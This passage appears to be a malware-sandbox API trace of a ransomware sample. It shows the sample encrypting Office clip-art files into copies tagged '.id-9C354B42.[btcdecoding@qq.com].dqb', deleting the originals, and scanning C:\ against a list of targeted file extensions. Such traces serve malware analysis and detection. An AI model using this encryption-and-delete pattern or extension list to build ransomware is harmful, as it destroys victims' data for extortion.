lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0x12f0, lpOverlapped=0x0) returned 1 [0274.745] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.745] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.745] SetEndOfFile (hFile=0x1d4) returned 1 [0274.745] CloseHandle (hObject=0x1d4) returned 1 [0274.745] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.745] SetEndOfFile (hFile=0x328) returned 1 [0274.748] CloseHandle (hObject=0x328) returned 1 [0274.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.748] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 1 [0274.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.749] lstrlenW (lpString=".doc") returned 4 [0274.749] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.749] lstrlenW (lpString=".docx") returned 5 [0274.749] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.749] lstrlenW (lpString=".pdf") returned 4 [0274.749] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.749] lstrlenW (lpString=".xls") returned 4 [0274.749] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.749] lstrlenW (lpString=".xlsx") returned 5 [0274.749] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.749] lstrlenW (lpString=".ppt") returned 4 [0274.749] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.749] lstrlenW (lpString=".zip") returned 4 [0274.749] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.749] lstrlenW (lpString=".rar") returned 4 [0274.749] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.749] lstrlenW (lpString=".bz2") returned 4 [0274.749] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.749] lstrlenW (lpString=".7z") returned 3 [0274.749] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.749] lstrlenW (lpString=".dbf") returned 4 [0274.749] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.749] lstrlenW (lpString=".1cd") returned 4 [0274.750] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString=".jpg") returned 4 [0274.750] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString=".doc") returned 4 [0274.750] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.750] lstrlenW (lpString=".docx") returned 5 [0274.750] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.750] lstrlenW (lpString=".pdf") returned 4 [0274.750] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.750] lstrlenW (lpString=".xls") returned 4 [0274.750] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.750] lstrlenW (lpString=".xlsx") returned 5 [0274.750] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.750] lstrlenW (lpString=".ppt") returned 4 [0274.750] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString=".zip") returned 4 [0274.750] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.750] lstrlenW (lpString=".rar") returned 4 [0274.750] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.750] lstrlenW (lpString=".bz2") returned 4 [0274.750] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.750] lstrlenW (lpString=".7z") returned 3 [0274.750] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString=".dbf") returned 4 [0274.750] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.750] lstrlenW (lpString=".1cd") returned 4 [0274.750] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0274.751] lstrlenW (lpString=".jpg") returned 4 [0274.751] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.751] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.751] lstrlenW (lpString="FINCL_02.MID") returned 12 [0274.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.752] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=9318) returned 1 [0274.752] CloseHandle (hObject=0x328) returned 1 [0274.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 0x20 [0274.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.752] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.752] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.753] GetLastError () returned 0x0 [0274.753] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x2466, lpOverlapped=0x0) returned 1 [0274.754] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0274.755] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.755] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.755] SetEndOfFile (hFile=0x1d4) returned 1 [0274.755] CloseHandle (hObject=0x1d4) returned 1 [0274.755] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.755] SetEndOfFile (hFile=0x328) returned 1 [0274.759] CloseHandle (hObject=0x328) returned 1 [0274.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.759] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 1 [0274.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.759] lstrlenW (lpString=".doc") returned 4 [0274.759] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.759] lstrlenW (lpString=".docx") returned 5 [0274.759] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0274.760] lstrlenW (lpString=".pdf") returned 4 [0274.760] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.760] lstrlenW (lpString=".xls") returned 4 [0274.760] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.760] lstrlenW (lpString=".xlsx") returned 5 [0274.760] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0274.760] lstrlenW (lpString=".ppt") returned 4 [0274.760] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.760] lstrlenW (lpString=".zip") returned 4 [0274.760] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.760] lstrlenW (lpString=".rar") returned 4 [0274.760] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.760] lstrlenW (lpString=".bz2") returned 4 [0274.760] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.760] lstrlenW (lpString=".7z") returned 3 [0274.760] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.760] lstrlenW (lpString=".dbf") returned 4 [0274.760] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.760] lstrlenW (lpString=".1cd") returned 4 [0274.760] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.760] lstrlenW (lpString=".jpg") returned 4 [0274.760] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.761] lstrlenW (lpString=".doc") returned 4 [0274.761] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.761] lstrlenW (lpString=".docx") returned 5 [0274.761] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0274.761] lstrlenW (lpString=".pdf") returned 4 [0274.761] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.761] lstrlenW (lpString=".xls") returned 4 [0274.761] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.761] lstrlenW (lpString=".xlsx") returned 5 [0274.761] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0274.761] lstrlenW (lpString=".ppt") returned 4 [0274.761] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.761] lstrlenW (lpString=".zip") returned 4 [0274.761] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.761] lstrlenW (lpString=".rar") returned 4 [0274.761] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.761] lstrlenW (lpString=".bz2") returned 4 [0274.761] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.761] lstrlenW (lpString=".7z") returned 3 [0274.761] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.761] lstrlenW (lpString=".dbf") returned 4 [0274.761] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.761] lstrlenW (lpString=".1cd") returned 4 [0274.761] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0274.762] lstrlenW (lpString=".jpg") returned 4 [0274.762] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.762] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.762] lstrlenW (lpString="GRDEN_01.MID") returned 12 [0274.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.763] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=7567) returned 1 [0274.763] CloseHandle (hObject=0x328) returned 1 [0274.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 0x20 [0274.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.763] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.763] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.764] GetLastError () returned 0x0 [0274.764] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x1d8f, lpOverlapped=0x0) returned 1 [0274.765] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0x1d90, lpOverlapped=0x0) returned 1 [0274.766] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.766] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.766] SetEndOfFile (hFile=0x1d4) returned 1 [0274.767] CloseHandle (hObject=0x1d4) returned 1 [0274.767] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.767] SetEndOfFile (hFile=0x328) returned 1 [0274.769] CloseHandle (hObject=0x328) returned 1 [0274.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) Thread: id = 98 os_tid = 0x678 [0268.848] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3a50070 [0268.848] lstrlenW (lpString="C:") returned 2 [0268.848] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x324fd00 | out: lpFindFileData=0x324fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x659140 [0268.849] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0268.849] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0268.849] lstrlenW (lpString="$Recycle.Bin") returned 12 [0268.849] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0268.849] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3a60078 [0268.849] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0268.849] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x324fa84 | out: lpFindFileData=0x324fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x659180 [0268.849] FindNextFileW (in: hFindFile=0x659180, lpFindFileData=0x324fa84 | out: lpFindFileData=0x324fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0268.849] FindNextFileW (in: hFindFile=0x659180, lpFindFileData=0x324fa84 | out: lpFindFileData=0x324fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0268.849] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0268.849] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0268.850] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0268.850] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0268.850] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3a70080 [0268.850] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0268.850] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x324f808 | out: lpFindFileData=0x324f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x63d2c8 [0268.850] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x324f808 | out: lpFindFileData=0x324f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0268.850] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x324f808 | out: lpFindFileData=0x324f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc81fca60, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.850] lstrlenW (lpString="desktop.ini") returned 11 [0268.850] lstrlenW (lpString=".1cd") returned 4 [0268.850] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0268.850] lstrlenW (lpString=".3ds") returned 4 [0268.850] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0268.850] lstrlenW (lpString=".3fr") returned 4 [0268.850] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0268.850] lstrlenW (lpString=".3g2") returned 4 [0268.850] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0268.850] lstrlenW (lpString=".3gp") returned 4 [0268.850] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".7z") returned 3 [0268.851] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0268.851] lstrlenW (lpString=".accda") returned 6 [0268.851] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".accdb") returned 6 [0268.851] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".accdc") returned 6 [0268.851] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".accde") returned 6 [0268.851] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".accdt") returned 6 [0268.851] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".accdw") returned 6 [0268.851] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0268.851] lstrlenW (lpString=".adb") returned 4 [0268.851] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".adp") returned 4 [0268.851] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai") returned 3 [0268.851] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0268.851] lstrlenW (lpString=".ai3") returned 4 [0268.851] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai4") returned 4 [0268.851] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai5") returned 4 [0268.851] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai6") returned 4 [0268.851] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai7") returned 4 [0268.851] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".ai8") returned 4 [0268.851] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0268.851] lstrlenW (lpString=".anim") returned 5 [0268.851] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0268.852] lstrlenW (lpString=".arw") returned 4 [0268.852] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".as") returned 3 [0268.852] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0268.852] lstrlenW (lpString=".asa") returned 4 [0268.852] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 